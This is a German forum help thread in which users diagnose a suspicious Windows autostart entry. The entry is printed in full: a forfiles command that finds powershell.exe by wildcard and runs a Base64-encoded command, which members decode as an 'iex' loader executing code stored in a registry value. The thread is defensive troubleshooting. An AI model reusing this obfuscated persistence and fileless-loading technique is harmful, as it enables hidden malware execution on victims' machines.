[gelöst] forfiles

[Tomsen]

Hallo Miteinander

Ich hab ein Win 10 Problem wo ich echt nicht weiterkomme oder auf einem riesen Schlauch stehe..

Kurz nach der Pin eingabe erscheint für 1 sek. dieses Dos Fenster (siehe Anhang)
Da stehen wohl viele Sachen drin, die bringen mich aber nicht weiter
Der forfiles Eintrag steht auch im Autostart...wenn ich den deaktiviere erscheint wohl das Dos Fenster nicht mehr aber die ganzen Einträge im Symbolfenster in der Taskliste unten rechts sind dann weg.
Ausser dem erscheinen dieser Dos Fehlermeldung merke aber nichts...funktioniert alles wie es soll.
Das einzige was ich im i-net gefunden habe ist ein Wahnsinnig vertrauenswürdiges Programm das man installieren soll die die forfiles wieder herstellen soll.

vielleicht kann mir hier ja jemand helfen...danke schonmal im voraus

Gruss Tomsen

 

[areiland]

Und den genauen Autostart für Forfiles magst Du uns nicht einfach mal zeigen? Denn Forfiles wird vom System normalerweise gar nicht in Anspruch genommen - hier ist also von einer möglichen Manipulation des Systems auszugehen.

 

[Tomsen]

Danke für deine Antwort...
Doch natürlich

 

[areiland]

Öffne mal eine Eingabeaufforderung und führe den Befehl: wmic startup list full aus. Das Ergebnis von Forfiles kopierst Du dann und zeigst es mir. Ich würde nämlich gerne die gesamte Befehlszeile sehen.

 

[Tomsen]

 

[areiland]

Führe den Befehl bitte in einer Eingabeaufforderung mit Adminrechten aus! Ausserdem: Man kann den gewünschten Teil einer Ausgabe problemlos auch mit der Maus kopieren und hier als Text einfügen.

 

[Tomsen]

ja...deutlich einfacher

Ausgeblendet

Windows PowerShell
Copyright (C) Microsoft Corporation. Alle Rechte vorbehalten.

PS C:\WINDOWS\system32> wmic startup list full


Caption=OneDriveSetup
Command=C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup
Description=OneDriveSetup
Location=HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SettingID=
User=NT-AUTORITÄT\Lokaler Dienst


Caption=OneDriveSetup
Command=C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup
Description=OneDriveSetup
Location=HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SettingID=
User=NT-AUTORITÄT\Netzwerkdienst


Caption=IQTray
Command=IQTray.lnk
Description=IQTray
Location=Startup
SettingID=
User=MIFCOM-MANTEK\Tkeus


Caption=myCloud Desktop
Command=myCloud Desktop.lnk
Description=myCloud Desktop
Location=Startup
SettingID=
User=MIFCOM-MANTEK\Tkeus


Caption=OneDrive
Command="C:\Users\Tkeus\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
Description=OneDrive
Location=HKU\S-1-5-21-3995944002-1993681224-4128824138-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SettingID=
User=MIFCOM-MANTEK\Tkeus


Caption=Steam
Command="C:\Steam\steam.exe" -silent
Description=Steam
Location=HKU\S-1-5-21-3995944002-1993681224-4128824138-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SettingID=
User=MIFCOM-MANTEK\Tkeus


Caption=Iconcon
Command=forfiles /p C:\Windows\system32 /s /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsARAA4ADYARgA4AEEARQAxAC0ANgBGAEQAQQAtAEUARABCAEUALQA3ADEANAA3AC0AOAAzADkANgBEADAANgBBAEEAOQA5ADEAfQAnACkALgBTAA==" /m p*ll.*e
Description=Iconcon
Location=HKU\S-1-5-21-3995944002-1993681224-4128824138-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SettingID=
User=MIFCOM-MANTEK\Tkeus


Caption=Vivaldi Update Notifier
Command="C:\Users\Tkeus\AppData\Local\Vivaldi\Application\update_notifier.exe"
Description=Vivaldi Update Notifier
Location=HKU\S-1-5-21-3995944002-1993681224-4128824138-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SettingID=
User=MIFCOM-MANTEK\Tkeus


Caption=SpyderUtility
Command=C:\PROGRA~2\DATACO~1\SPYDER~1\Utility\SPYDER~1.EXE
Description=SpyderUtility
Location=Common Startup
SettingID=
User=Public


Caption=SecurityHealth
Command=%windir%\system32\SecurityHealthSystray.exe
Description=SecurityHealth
Location=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SettingID=
User=Public


Caption=Launch LCore
Command=C:\Program Files\Logitech Gaming Software\LCore.exe /minimized
Description=Launch LCore
Location=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SettingID=
User=Public


Caption=AdobeAAMUpdater-1.0
Command="C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
Description=AdobeAAMUpdater-1.0
Location=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SettingID=
User=Public


Caption=AdobeGCInvoker-1.0
Command="C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe"
Description=AdobeGCInvoker-1.0
Location=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SettingID=
User=Public



PS C:\WINDOWS\system32>

 

[build10240]

Das sieht verdächtigt nach der kürzlich in der c't vorgestellten DOSfuscation aus, also der Versuch Malware auszuführen. https://www.heise.de/select/ct/2019/04/1549874948507251

 

[Tomsen]

hoppla...
Da scheint es auch noch nicht so wirklich ein Lösung zu geben

jedenfalls vielen Dank für deine Bemühung !

 

[areiland]

Dann lösch doch zunächst mal den Eintrag aus dem Autostart (steht im Registryschlüssel HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run) und führe anschliessend einen offline Virenscan durch.

Und bitte für die Zukunft: Wenn ich aus einem solchen Auszug nur einen Part sehen möchte, dann möcht ich auch nur diesen Part sehen und nicht trotzdem die gesamte Auflistung der Ausgabe eines Befehles. Etwas eigenes Denken schadet nicht wirklich.

 

[Gelöschtes Mitglied 78250]

Wenn ich das Ziel anschaue:;

p*ll.*e

powershell.exe
rdpshell.exe
lpkinstall.exe

Zu -ec finde ich nichts bei forfiles oder cmd.
Der Kiste würde ich keinen Millimeter mehr trauen.

 

[Tomsen]

Ja... So gings mir auch, ich trau der ganzen Sache auch überhaupt nicht und weitere infos hab ich keine mehr gefunden...
Die lösung... Format c: windows 10 neu aufgesetzt.

Danke nochmals für eure Hilfe

 

[build10240]

Wenn ich das Ziel anschaue:;

powershell.exe
rdpshell.exe
lpkinstall.exe

Zu -ec finde ich nichts bei forfiles oder cmd.
Der Kiste würde ich keinen Millimeter mehr trauen.

Nach der Syntax von forfiles würde der Befehl cmd /c powershell.exe -ec aQB... ausgeführt Der Parameter ec könnte eine Abkürzung von -EncodedCommand sein. Demnach wäre der Buchstabensalat Base64 kodiert. Jagt man das durch einen Konverter und löscht nicht darstellbare Zeichen, erhält man folgenden Powershell-Befehl: iex (gp 'HKCU:\Identities\{D86F8AE1-6FDA-EDBE-7147-8396D06AA991}').S

 

[Gelöschtes Mitglied 78250]

Das ist UTF-16
https://www.base64decode.org/

aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsARAA4ADYARgA4AEEARQAxAC0ANgBGAEQAQQAtAEUARABCAEUALQA3ADEANAA3AC0AOAAzADkANgBEADAANgBBAEEA OQA5ADEAfQAnACkALgBTAA==

iex (gp 'HKCU:\Identities\{D86F8AE1-6FDA-EDBE-7147-8396D06AA991}').S

IEX
https://docs.microsoft.com/en-us/po...l.utility/invoke-expression?view=powershell-6

Identities
https://www.radford.edu/~nethelp/outlook/identities.htm

GP unbekannt, "group policies"?
.s unbekannt
Müsste man in Powershell suchen.

Ich kann nur spekulieren, ob da versucht wurde, Outlook bzw Mail zu kapern und als Spam- oder Malwareschleuder nutzen zu wollen, ohne das Anwender das mitbekommt, weil die Rechte verändert worden sind.

 

[build10240]

gp ist die Abkürzung für Get-ItemProperty. Zur Manipulation ist der Befehl so aber m.E. nicht geeignet.